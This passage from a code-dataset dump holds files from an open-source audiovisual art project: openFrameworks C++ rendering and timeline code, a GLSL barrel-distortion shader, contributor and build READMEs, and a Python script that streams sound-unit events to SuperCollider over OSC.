instanced.setZnzFreq(gm.gNzZFreq * MAX_NZ_FREQ);\n instanced.setZnzRug(gm.gNzZRug * MAX_NZ_RUG*w);\n \n //light pos\n \n light.setPosition(gm.gLightPos->x * MAX_LIGHT_X,\n gm.gLightPos->y * MAX_LIGHT_Y,\n gm.gLightPos->z * MAX_LIGHT_Z );\n }\n else if (currentValuesMode==TIMELINE){\n \n if(!timelineApp->timeline.isSwitchOn(\"mode\"))instanced.setMode(LINEAL);\n else if(timelineApp->timeline.isSwitchOn(\"mode\") && !timelineApp->timeline.isSwitchOn(\"radMode\")) instanced.setMode(RAD_CONCENTRIC);\n else if(timelineApp->timeline.isSwitchOn(\"mode\") && timelineApp->timeline.isSwitchOn(\"radMode\")){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(timelineApp->timeline.getValue(\"radDeform\"));\n }\n \n instanced.setWidth(timelineApp->timeline.getValue(\"width\"));\n instanced.setHeight(timelineApp->timeline.getValue(\"height\"));\n instanced.setCubeSize(timelineApp->timeline.getValue(\"cubesize\") * MAX_CUBESIZE *w);\n instanced.setMaskRadius(timelineApp->timeline.getValue(\"maskRadius\"));\n instanced.setHres(timelineApp->timeline.getValue(\"Hres\") * MAX_H_RES);\n instanced.setVres(timelineApp->timeline.getValue(\"Vres\") * MAX_V_RES);\n instanced.setXpos(timelineApp->timeline.getValue(\"Xpos\"));\n instanced.setYpos(timelineApp->timeline.getValue(\"Ypos\"));\n instanced.setVelocity(timelineApp->timeline.getValue(\"velocity\") * MAX_VELOCITY);\n //nz\n instanced.setNzTime(timelineApp->timeline.getValue(\"nzTime\") * MAX_NZ_TIME);\n \n instanced.setXnzAmp(timelineApp->timeline.getValue(\"nzXAmp\") * MAX_NZ_AMP *w);\n instanced.setXnzFreq(timelineApp->timeline.getValue(\"nzXFreq\") * MAX_NZ_FREQ);\n instanced.setXnzRug(timelineApp->timeline.getValue(\"nzXRug\") * MAX_NZ_RUG *w);\n \n instanced.setYnzAmp(timelineApp->timeline.getValue(\"nzYAmp\") * MAX_NZ_AMP *w);\n instanced.setYnzFreq(timelineApp->timeline.getValue(\"nzYFreq\") * MAX_NZ_FREQ);\n instanced.setYnzRug(timelineApp->timeline.getValue(\"nzYRug\") * MAX_NZ_RUG *w);\n \n instanced.setZnzAmp(timelineApp->timeline.getValue(\"nzZAmp\") * MAX_NZ_AMP*w);\n instanced.setZnzFreq(timelineApp->timeline.getValue(\"nzZFreq\") * MAX_NZ_FREQ);\n instanced.setZnzRug(timelineApp->timeline.getValue(\"nzZRug\") * MAX_NZ_RUG *w);\n \n //light pos\n \n light.setPosition(gm.gLightPos->x * MAX_LIGHT_X,\n gm.gLightPos->y * MAX_LIGHT_Y,\n gm.gLightPos->z * MAX_LIGHT_Z );\n \n \n }\n\n}\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key){\n //start-stop Animation--------------------\n case ' ':\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //start-stop Animation & Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n \n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //change resolution-----------------------------\n case '1':\n if(renderer.getOutputResolution()!= r256){\n renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n \n //change recording mode---------------\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n\n case 'g':\n bShowGui = !bShowGui;//show-hide gui\n break;\n case 't':\n if(currentValuesMode==GUI)currentValuesMode=TIMELINE;\n else if(currentValuesMode==TIMELINE)currentValuesMode=GUI;\n break;\n default:\n break;\n }\n \n}\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n isAnimating=true;\n ofLogNotice(\"Animation STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n frameCounter = 0;\n isAnimating = false;\n ofLogNotice(\"Animation STOPED\");\n}\n\n" }, { "alpha_fraction": 0.583791196346283, "alphanum_fraction": 0.5892857313156128, "avg_line_length": 14.82608699798584, "blob_id": "a42a7e18faeb596c6f3c7b625473ff6ef5e56531", "content_id": "4d1c0e40f3ca725c08f5b27a72fd8f6c0fe44e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 728, "license_type": "no_license", "max_line_length": 52, "num_lines": 46, "path": "/Graphics/apps/videoTest_3/src/particleSystem/ParticleGroupSystem.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n\n#include \"ParticleGroup.h\"\n\n\nclass ParticleGroupSystem{\n\n public:\n \n void setup(int x, int y, int w, int h, int dir);\n void update(std::map<string, float>& data);\n void drawParticles();\n void exit(){};\n \n void addParticlesGroup(int groupPartsNum);\n \n void addGpuParticles(ofVec3f pos);\n \n void setDoAddRandom(bool b){bDoAddRandom = b;}\n \n bool getDoAddRandom(){return bDoAddRandom;}\n \n int _w, _h;\n int _x, _y;\n \n int _dir;//-1, 1\n \n ofVec2f bounds_h;\n \n vector<ParticleGroup*> partGroups;\n \n float _minRadius, _maxRadius;\n \n float radiusInit;\n float angleInit;\n \n bool bDoAddRandom;\n \n \n \n \n\n\n};\n" }, { "alpha_fraction": 0.6464690566062927, "alphanum_fraction": 0.666085422039032, "avg_line_length": 30.397260665893555, "blob_id": "7319d26dc6f036fd82ef814723cd3cad513b124e", "content_id": "1efab7ad6c7d5563b1518e248d5ddad279febd23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2294, "license_type": "no_license", "max_line_length": 82, "num_lines": 73, "path": "/Graphics/apps/videoTest_2/src/TimelineApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"TimelineApp.h\"\n\nvoid TimelineApp::setup(){\n\n ofBackground(40);\n\tofSetVerticalSync(false);\n \n ofSetLogLevel(OF_LOG_VERBOSE);\n \n timeline.setWorkingFolder(\"timeline\");\n \n ofxTimeline::removeCocoaMenusFromGlut(\"AllTracksExample\");\n timeline.setup();\n timeline.setFrameRate(FRAME_RATE);\n timeline.setDurationInSeconds(DURATION);\n timeline.setFrameBased(TRUE);\n \n \n#ifdef TIMELINE_VIDEO_INCLUDED\n timeline.addVideoTrack(\"fingers\", \"fingers.mov\");\n#endif\n#ifdef TIMELINE_AUDIO_INCLUDED\n timeline.addAudioTrack(\"audio\", \"4chan.wav\");\n timeline.setDurationInSeconds(timeline.getAudioTrack(\"audio\")->getDuration());\n#endif\n \n timeline.addSwitches(\"mode\");\n timeline.addSwitches(\"radMode\");\n timeline.addCurves(\"width\", ofRange(0, 1));\n timeline.addCurves(\"height\", ofRange(0, 1));\n timeline.addCurves(\"Xpos\", ofRange(0, 1));\n timeline.addCurves(\"Ypos\", ofRange(0, 1));\n timeline.addCurves(\"Hres\", ofRange(0, 1));\n timeline.addCurves(\"Vres\", ofRange(0, 1));\n \n timeline.setPageName(\"General\");\n \n //timeline.addSwitches(\"switches\");\n \n timeline.addPage(\"Parameters\");\n timeline.setCurrentPage(\"Parameters\");\n timeline.addCurves(\"velocity\", ofRange(0, 1));\n timeline.addCurves(\"maskRadius\", ofRange(0, 1));\n timeline.addCurves(\"radDeform\", ofRange(0, 1));\n timeline.addCurves(\"cubesize\", ofRange(0, 1));\n timeline.addCurves(\"fisheye\", ofRange(0, 1));\n \n timeline.addPage(\"Noise\");\n timeline.setCurrentPage(\"Noise\");\n timeline.addCurves(\"nzTime\", ofRange(0, 1));\n timeline.addCurves(\"nzXAmp\", ofRange(0, 1));\n timeline.addCurves(\"nzXFreq\", ofRange(0, 1));\n timeline.addCurves(\"nzXRug\", ofRange(0, 1));\n timeline.addCurves(\"nzYAmp\", ofRange(0, 1));\n timeline.addCurves(\"nzYFreq\", ofRange(0, 1));\n timeline.addCurves(\"nzYRug\", ofRange(0, 1));\n timeline.addCurves(\"nzZAmp\", ofRange(0, 1));\n timeline.addCurves(\"nzZFreq\", ofRange(0, 1));\n timeline.addCurves(\"nzZRug\", ofRange(0, 1));\n \n timeline.setCurrentPage(\"General\");\n\n timeline.enableSnapToOtherKeyframes(false);\n //timeline.setLoopType(OF_LOOP_NORMAL);\n timeline.setLoopType(OF_LOOP_NONE);\n \n \n}\n//---------------------\n\nvoid TimelineApp::draw(){\n timeline.draw();\n}\n" }, { "alpha_fraction": 0.5846354365348816, "alphanum_fraction": 0.5924479365348816, "avg_line_length": 16.837209701538086, "blob_id": "6ab9c1602fca5335d33f8536e1d44b43d1c6d0f7", "content_id": "596694dc0b5caed0b4f326a9c38ab1651567d7c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 768, "license_type": "no_license", "max_line_length": 96, "num_lines": 43, "path": "/Graphics/apps/final/src/particleSystem/ParticleGroup.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#pragma once\n\n#include \"ofMain.h\"\n#include \"BosqueConstants.h\"\n\n\n\nclass ParticleGroup{\n\n public:\n \n ParticleGroup(int partsNum, int x, int y, int w, int d, float radiusInit, float angleInit);\n ~ParticleGroup();\n \n void update(std::map<string, float>& data);\n void draw();\n \n int getPartsNum(){return _partsNum;}\n bool isOutOfBounds(int x_min, int x_max);\n ofVec3f getAnchorPos(){return _anchor;}\n \n //Vars---\n vector<ofVec3f> positions;\n \n \n \n private:\n //int _Xpos;\n int _x, _y, _z;\n int _w;\n int _dir;//-1 o 1\n int _partsNum;\n int _size;\n float _angle;\n \n float _rotAngleInit;\n float _rotRadiusInit;\n \n ofVec3f _anchor;\n vector<ofVec3f> velocities;\n \n int frameCounter;\n};\n" }, { "alpha_fraction": 0.744926393032074, "alphanum_fraction": 0.7495025992393494, "avg_line_length": 29.64634132385254, "blob_id": "fa4303be69305e215724cd71ca35acdb2bd50872", "content_id": "f75ad9f3ab8a05c290cb6474eebe3171fc7b78d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5026, "license_type": "no_license", "max_line_length": 432, "num_lines": 164, "path": "/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# lhcvmm\nLarge Hadron Collider Visual Music Machine\n\n[![Join the chat at https://gitter.im/Opensemble](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Opensemble)\n\n# What lives here\n\n* rendererExample: this is the very first inner-project of LHCVMM. Is a video renderer engine built on Open Frameworks needed to test drive the Full-Dome hardware where the final project will be presented.\n\n\n# Collaborating\n\nWe are using, for the time being, a centralized git workflow and a single branch `master`. Hopefully we'll grow enough to embrace a more complex git workflow.\n\n### starting\n\nFirst of all, you'll need to clone this repo. We'll do it on the command line as is the easiest way to *understand* Git.\n\n```bash\n\ngit clone [email protected]:Opensemble/lhcvmm.git\n\n```\n\nYou'll have now a directory named lhcvmm with the source code inside.\n\n\n### Adding and publishing changes\n\nOnce cloned, you can start working on your working copy, add new files or changes.\nIn order to share them withthe community you'll need to upload them to Github again.\nThis is done in 3 steps:\n\n1. Add you changes\n2. get other people's changes\n3. upload to github\n\n#### 1. Add you changes\n After modifiying the files you need to add the changes to version control:\n\n```bash\n\ngit add <filename>\n\n```\n\nwhere `<filename>` can be a single file, a list of files separated by spaces, a directory (this will add every file changed under that directory and its children)\n\n\nThen you need to bundle those changes in a commit:\n\n```bash\n\ngit commit\n\n```\n\nThis will open a text editor so you can leave a message so other developers in the same project can know what changes you made, why you made them, and any other information you think it will be useful or necesary for other people. Think of this message as a mail that you would send to another developer/artist regarding what you've worked on. (see the section `commit messages format` for a detailed explanation how to write these)\nThis may look as a boring o boureaucratic step, but in open source projects, a good communication is a key piece of a successful project, and having a readable commit history is part of that.\n\n\n#### 2. Get Other peoples changes\n\nIf while you were working other people pushed their commits to github, then Git will ask you to update your working copy, as there are changes already published that you don't have.\nAnd to avoid problems, you always have to be up to date before publishing your changes. For this you do:\n\n```bash\n\ngit pull --rebase\n\n```\n\nThis is command will connect to Github, fetch the last changes, and add all of those before the changes you commited in the previous step.\n(pull will fetch the changes, and the --rebase option will place them before your work).\n\nIf the changes you brought from Github are on different files and or different lines, then your local repository is now updated.\nBut what happens if in the changes you pulled from Github, another developer changed exactly the same lines you also changed?\nHow does Git know which of the two versions is the correct?\n\n*It does not!*\n\nThat's called a *conflict* and Git will let you know that it encountered one while merging your changes with the other's people changes.\nAnd you have to resolve it by hand (this is one of the things the commits messages are usefull for :) )\nYou'll see something like:\n\n```Git\n\nOn branch branch-b\n # You have unmerged paths.\n # (fix conflicts and run \"git commit\")\n #\n # Unmerged paths:\n # (use \"git add ...\" to mark resolution)\n #\n # both modified: planets.md\n #\n no changes added to commit (use \"git add\" and/or \"git commit -a\")\n\n```\n\nTo resolve a conflict you'll need to edit the file with conflicts (_planets.md_ in this example) and search for the lines between:\n\n```diff\n\n<<<<<<< HEAD (your current version)\nnine\n=======\neight\n>>>>>>> another-commit-hash (the version published by the other dev)\n\n```\n\nSo you need to decide which of the two set of lines is the correct one, the one before the `=====` or the one after those.\nOnce decided, you erase the other one, and all the weird chars added by Git.\nNext you need to tell git that you resolved the conflict:\n\n```bash\n\ngit add <the-file-or-files-with-resolved-conflicts>\n\n```\n\nAnd to continue with the update process you run:\n\n```bash\n\ngit rebase --continue\n\n```\n\nThis command will stop again if it finds another conflict. You'll need to repeat the process.\n\nIf it doesn't find more conflicts, then, you are ready to upload your changes to Github\n\n\n#### 3. upload to github\n\nTo send you changes to github you run:\n\n```bash\n\ngit push\n\n```\n\n\n\n\n### Apendix 1: Commit Message Format\n\nHere are some pretty good guidelines and arguments about good commit messages\n\nhttps://robots.thoughtbot.com/5-useful-tips-for-a-better-commit-message\n\nAnd here about how should be formatted:\n\nhttp://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html\n\n\n### Apendix 2: The ultimate Git documentation\n\nhttps://git-scm.com/book/en/v2\n\nchapters 2 and 3 should be more than enough to begin understandig Git :)\n" }, { "alpha_fraction": 0.774333119392395, "alphanum_fraction": 0.7786589860916138, "avg_line_length": 48.53571319580078, "blob_id": "d034ce61336fb1242566b6d8f590af7fa8d6be2c", "content_id": "984ba46e8fc8de35b25cb48b3f34e04084e7cc88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1387, "license_type": "no_license", "max_line_length": 220, "num_lines": 28, "path": "/Music/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "We are working with [Ambisonic surround sound](https://en.wikipedia.org/wiki/Ambisonics) in this project, and to make things easier we use the Ambisonic Toolkit (ATK) which offers a great number of encoders and decoders.\n\nCheck [Introducing the Ambisonic Toolkit](http://www.ambisonictoolkit.net/Help/Guides/Intro-to-the-ATK.html) if you want to get more info.\n\n\nYou have to install [SC plugins](https://github.com/supercollider/sc3-plugins) (which includes ATK) to get the examples working.\nFollow installation instructions at their [github repository](https://github.com/supercollider/sc3-plugins)\n\nSome quick tips to build from source:\n\n git clone https://github.com/supercollider/supercollider.git\n git clone https://github.com/supercollider/sc3-plugins.git\n cd sc3-plugins\n git submodule init && git submodule update\n mkdir build && cd build\n cmake -DSC_PATH=../../supercollider ..\n make\n make install\n mv SC3plugins /paht/to/sc3-extensions #(you find out which one that is by evaluating Platform.userExtensionDir from within SuperCollider).\n\n\n\nMake also sure that `MathLib` is installed. You can do so by executing `Quarks.gui` in supercollider IDE.\nYou should recompile the class labrary after installing `MathLib` ( Language -> Recompile Class Library)\n\nHere's a diagram of the atk infrastrcuture we'll use:\n\n![lhcvmm Atk Infrastructure](lhcvmm_atk_infrastructure.png)\n" }, { "alpha_fraction": 0.631393313407898, "alphanum_fraction": 0.6340388059616089, "avg_line_length": 18.237287521362305, "blob_id": "2d6d7731c3ea572f95303af90aa6c7ccce1b06d6", "content_id": "3df0e1de1ad128b2ff6f386bcfb840a98d307272", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1134, "license_type": "no_license", "max_line_length": 46, "num_lines": 59, "path": "/Graphics/apps/videoTest_3/src/SphereManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n\n#include \"ofxGui.h\"\n#include \"DisplacementSphereMesh.h\"\n\nclass SphereManager{\n\npublic:\n \n void setup();\n void update();\n void drawScene();\n void exit(){};\n \n void setupGui();\n void drawGui();\n \n void setPosition(ofVec3f pos){_pos = pos;}\n ofVec3f getPosition(){return _pos;}\n \n void setColor(ofColor col);\n \n \n\n \n ofColor _mainColor;\n \n ofMaterial material;\n ofVec3f _pos;\n \n //Cubes-sphere----------------\n ofSpherePrimitive sphereCubes;\n ofMesh cubeMesh;\n \n //Displacement-sphere-------\n DisplacementSphereMesh displacement;\n int dispResolution;\n vector<ofMeshFace> triangles;\n ofSpherePrimitive sphereDistor;\n float dispNzAmnt;\n bool bDoFaceSh, bDoFaces;\n ofShader faceShader;\n ofShader phongShader;\n \n //gui------------------\n ofxPanel gui;\n ofxFloatSlider velGui;\n ofxFloatSlider volumeGui;\n ofxFloatSlider xGui, yGui;\n ofxFloatSlider radiusGui;\n ofxIntSlider resolGui;\n ofxFloatSlider faceNoiseGui;\n ofxFloatSlider strengthGui;\n ofxFloatSlider zPos;\n\n \n};" }, { "alpha_fraction": 0.8030303120613098, "alphanum_fraction": 0.8060606122016907, "avg_line_length": 109.05555725097656, "blob_id": "399ce603b0baea6be62101fbf257e8c7785a15db", "content_id": "ce1156be652e2558554ff0b41f5683e64ad1ed42", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1980, "license_type": "permissive", "max_line_length": 530, "num_lines": 18, "path": "/Graphics/addons/ofxVideoRecorder/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#ofxVideoRecorder\n\n##Original addon version: https://github.com/timscaffidi/ofxVideoRecorder\n\n###a fast multi-threaded video recording extension using ffmpeg.\nMulti-threaded design allows your app to run at full speed while worker threads pipe video and/or audio data to an instance of ffmpeg. If both audio and video recording is enabled, A/V synchronization is maintained by dynamically adding or skipping frames of video when needed to match the pace of the incoming audio stream; This feature compensates for inconsistant incoming frame-rates (from a camera which adjusts shutter-speed in low light for example) and produces a stable output frame-rate with no synchronization problems.\n\nofxVideoRecorder relies on [ffmpeg](http://ffmpeg.org) the cross-platform command line program for A/V encoding/decoding. You must have ffmpeg installed in either your system's path directories or in a custom location using the setFfmpegLocation() function (your data folder for example).\n\n##Usage\n1. Setup the video recorder. Several setup functions exist from simple to advanced. The setup function will create audio and video pipe files if necessary, launch A/V worker threads, and the main ffmpeg encoding thread.\n2. Add frames and/or audio data.\n\t* Give the recorder ofPixels objects that match the size you set it up at.\n\t* Currently only supports RGB 8Bits/channel. \n\t* Currently only supports ofSoundStream audio streams. Support for recording audio produced by ofSoundPlayer or ofVideoPlayer is not in openFrameworks yet. To record these sounds you will need to use a microphone or audio cable to loop back to the sound card.\n3. Close the recorder. This closes the pipes and stops the worker threads, once all input pipes are closed, ffmpeg stops listening for new data and will also return.\n4. Goto step 1 to start a new video recording.\n\t* Should also support multiple output streams using multiple recorder objects. A new pair of pipes will be created for each object's output." }, { "alpha_fraction": 0.7952622771263123, "alphanum_fraction": 0.8020304441452026, "avg_line_length": 48.25, "blob_id": "290ce6df7d4aa6ec9fe4fbc18635f7d2a90391f9", "content_id": "ffb4c53ae8015bc12c775f16a7a5ecc1f5cf82e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 595, "license_type": "no_license", "max_line_length": 234, "num_lines": 12, "path": "/Graphics/apps/videoTest_BA_Planetarium/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# Video Test for BA Planetarium\n\n###Description\n15” video sample for testing and calibrating the BA Planetarium Full Dome projection system. It’s designed for testing Linear, Concentric and Rotating motion with Fisheye Fx filters. \n\n###Dependencies\n\n* addons: ofxVideoRecorder, ofxFisheye\n* common_classes: VideoRenderer, ImageSaverThread\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF apps dir (OF_ROOT_DIR/apps/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.3471638560295105, "alphanum_fraction": 0.3739495873451233, "avg_line_length": 28.292306900024414, "blob_id": "197b65800067d35cdf11892f18b300ecf247a182", "content_id": "92a7e8b22df95faf1574b3a45b84da0195ae5b22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1904, "license_type": "no_license", "max_line_length": 99, "num_lines": 65, "path": "/Graphics/addons/ofxFisheye/src/fxBarrelDist.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n Shader based on http://github.prideout.net/barrel-distortion/\n */\n\n#pragma once\n\n#define STRINGIFY(A) #A\n\n#include \"ofMain.h\"\n\n\nclass fxBarrelDist{\npublic:\n \n string gl2FragmentShader;\n \n fxBarrelDist(){\n\n gl2FragmentShader = \"#version 120\\n\"; // For some reason \"#version 120\\n\" makes this break.\n gl2FragmentShader += STRINGIFY(\n \n uniform sampler2DRect tex0;\n uniform float width;\n uniform float height;\n \n uniform float amount = 1.5;//barrelPower (0.0-2.0)\n \n const float PI = 3.1415926535;\n \n \n vec2 Distort(vec2 p)\n {\n float theta = atan(p.y, p.x);\n float radius = length(p);\n radius = pow(radius, amount);\n p.x = radius * cos(theta);\n p.y = radius * sin(theta);\n return 0.5 * (p + 1.0);\n }\n \n \n void main(){\n \n vec2 texCoordNorm = vec2(gl_TexCoord[0].s/width ,gl_TexCoord[0].t/height);\n \n vec2 uv;\n vec2 xy = 2.0 * texCoordNorm - 1.0;\n \n float d = length(xy);\n \n if (d < 1.0){\n uv = Distort(xy);\n }else{\n uv = texCoordNorm;\n }\n \n vec2 texCoordRescaled= vec2(uv.x * width, uv.y*height);\n vec4 color = texture2DRect(tex0, texCoordRescaled);\n gl_FragColor = color;\n \n }\n \n );\n }\n};\n" }, { "alpha_fraction": 0.6118385195732117, "alphanum_fraction": 0.6271139979362488, "avg_line_length": 33.91428756713867, "blob_id": "63a4e8ac0e354ee0318bbf08aceaba990b2287c3", "content_id": "687d3658155e4b3fad9dd3b8e9418795a92b3f1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7332, "license_type": "no_license", "max_line_length": 136, "num_lines": 210, "path": "/Data/smalley.py", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "import time\nimport sys\nfrom thread import start_new_thread\nfrom OSC import OSCClient, OSCClientError, OSCBundle, OSCMessage\nfrom random import random, choice, uniform\nimport argparse\nimport csv\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('-c','--csv', help='Load events from csv.', action='store_false')\nparser.add_argument('-r','--random', help='Send random events. (will use a list otherwise)', action='store_true')\nparser.add_argument('-l','--loop', help='Loop events sequence.', action='store_true')\n\nargs = parser.parse_args()\n\ncsv_data = []\n# columns that must be converted to float\nfloat_indexes = [0,2,8,9,10,13,14,15,16,19,25,26,27,30,31,32,33,36,42,43,44,47,48,49,50]\nwith open('data_files/smalley.csv', 'rb') as csvfile:\n csv = csv.reader(csvfile, delimiter=',', quotechar='\"')\n csv.next() # first row\n csv.next() # and second row are headers\n for row in csv:\n for i, val in enumerate(row):\n if i in float_indexes:\n try:\n row[i] = float(row[i].replace(\",\", \".\"))\n except:\n row[i] = 0\n\n csv_data.append(row)\n\n\nosc_port = 57120 #default SuperCollider port (must be open before executing this program)\n# just some easy ansi colors printing: 'o' for ok, 'w' for warning, 'e' for error.\ndef printc(t, c='o'):\n print '\\033[9' + {'o': '2m','w': '3m','e': '1m'}[c] + t + '\\033[0m'\n\nonsets = ['','departure','emergence','anacrusis','attack','upbeat','downbeat']\ncontinuants = ['','passage','transition','prolongation','maintenance','statement']\nterminations = ['','arrival','disappearence','closure','release','resolution','plane']\nmorfological_functions = [onsets,continuants,terminations]\nduration_ranges = [ [0.01, 0.3], [0.4, 2], [0.2, 0.5]]\n\nunidirectional_motions = ['','ascent','plane','descent']\nreciprocal_motions = ['','parabola','oscilation','ondulation']\ncyclic_motions = ['','rotation','spiral','spin','vortex','pericentrality','centrifugal']\ncharacteristic_motions = ['','push','flow','rise','throw','drift','float','fly','plummet','dive','fall','tumble','sink','glide','slump']\n\ntexture_motion_relationships = ['','streaming', 'flocking', 'convolution','turbulence']\n\nspectrums = ['harmonic', 'inharmonic','granular','saturated']\nspectral_occupation_types = ['canopy', 'centre', 'root']\nspectral_densities = ['filled', 'packed', 'opaque','translucent','transparent','empty']\n\n# https://docs.google.com/feeds/download/spreadsheets/Export?key=16FjhAmzO4CZyGDEJfdMguKVnG9FgMQe8M04X5MLigR4&exportFormat=csv\n\n\n\ndef send_event(data):\n try:\n bundle = OSCBundle()\n msg = OSCMessage(\"/sound_unit\")\n for d in data:\n msg.append(d)\n\n bundle.append(msg)\n client.send(bundle)\n\n except OSCClientError, e:\n printc( \"\\OSCClientError: Connection refused on port %s.\" % osc_port, 'e')\n\n\ndef send_random_event():\n data = []\n\n for i in range(3):\n #onset, continuant, termination\n data.append(choice(morfological_functions[i]))\n #duration\n data.append(uniform(duration_ranges[i][0],duration_ranges[i][1]))\n # unidirectional_motions\n data.append(choice(unidirectional_motions))\n # reciprocal_motions\n data.append(choice(reciprocal_motions))\n # cyclic_motions\n data.append(choice(cyclic_motions))\n # characteristic_motions\n data.append(choice(characteristic_motions))\n\n # texture motion\n data.append(choice(texture_motion_relationships))\n data.append(uniform(0, 1)) # continuity-discontinuity (sustained -> granular -> iterative)\n data.append(uniform(0, 1)) # movement: periodic - aperiodic erratic\n data.append(uniform(0, 1)) # movement: accelerating - decelerating - flux\n\n # spectrum type\n data.append(choice(spectrums))\n\n #spectral occupation type\n data.append(choice(spectral_occupation_types))\n #spectral qualifiers\n data.append(uniform(0, 1)) # emptiness - plenitude\n data.append(uniform(0, 1)) # diffuseness - concentration\n data.append(uniform(0, 1)) # streams - interstices\n data.append(uniform(0, 1)) # overlap - crossover\n\n #spectral density\n data.append(choice(spectral_densities))\n\n send_event(data)\n\n\ntry:\n #initialize osc client\n client = OSCClient()\n client.connect(('127.0.0.1', osc_port)) # connect to SuperCollider\n\n starttime=time.time()\n\n if args.random:\n interval = 1.12 # time between events, in seconds\n print \"Start Sending events every %s seconds.\" % interval\n print \"Each * printed represents an event sent.\"\n print \"Press Ctrl + C to finalize.\"\n while 1:\n # restart * printing every 10 events\n sys.stdout.write('\\r----------\\r')\n for i in range(0, 10):\n send_random_event()\n time_to_sleep = interval - ((time.time() - starttime) % interval)\n sys.stdout.write('*')\n sys.stdout.flush()\n time.sleep(time_to_sleep)\n\n if args.csv:\n print \"Start Sending events from csv file.\"\n print \"Each * printed represents an event sent.\"\n print \"Press Ctrl + C to finalize.\"\n\n while 1:\n\n csv_data_index = 0\n\n sys.stdout.write('\\r')\n for i in range(len(csv_data)):\n sys.stdout.write('-')\n sys.stdout.write('\\r')\n\n for row in csv_data:\n send_event(row[1:])\n sys.stdout.write('*')\n sys.stdout.flush()\n\n time_to_sleep = row[0]\n if time_to_sleep > 0:\n time_to_sleep = time_to_sleep - ((time.time() - starttime) % time_to_sleep)\n time.sleep(time_to_sleep)\n\n if not args.loop:\n break\n\n\nexcept OSCClientError:\n printc( \"\\OSCClientError: Connection refused on port %s.\" % osc_port, 'e')\n\nexcept KeyboardInterrupt:\n print \"\\nProgram terminated.\"\n\n\n'''\n\n\nSound Unit\n\n\tMorfological framework\n\t\tFunction: Onsets, Continuants and Terminations\n\t\tDescription (palabras para cada categoria)\n\t\tDuration (float, en segundos)\n\t\tMotion and Growth\n\t\t\tMotion: unidirectional, 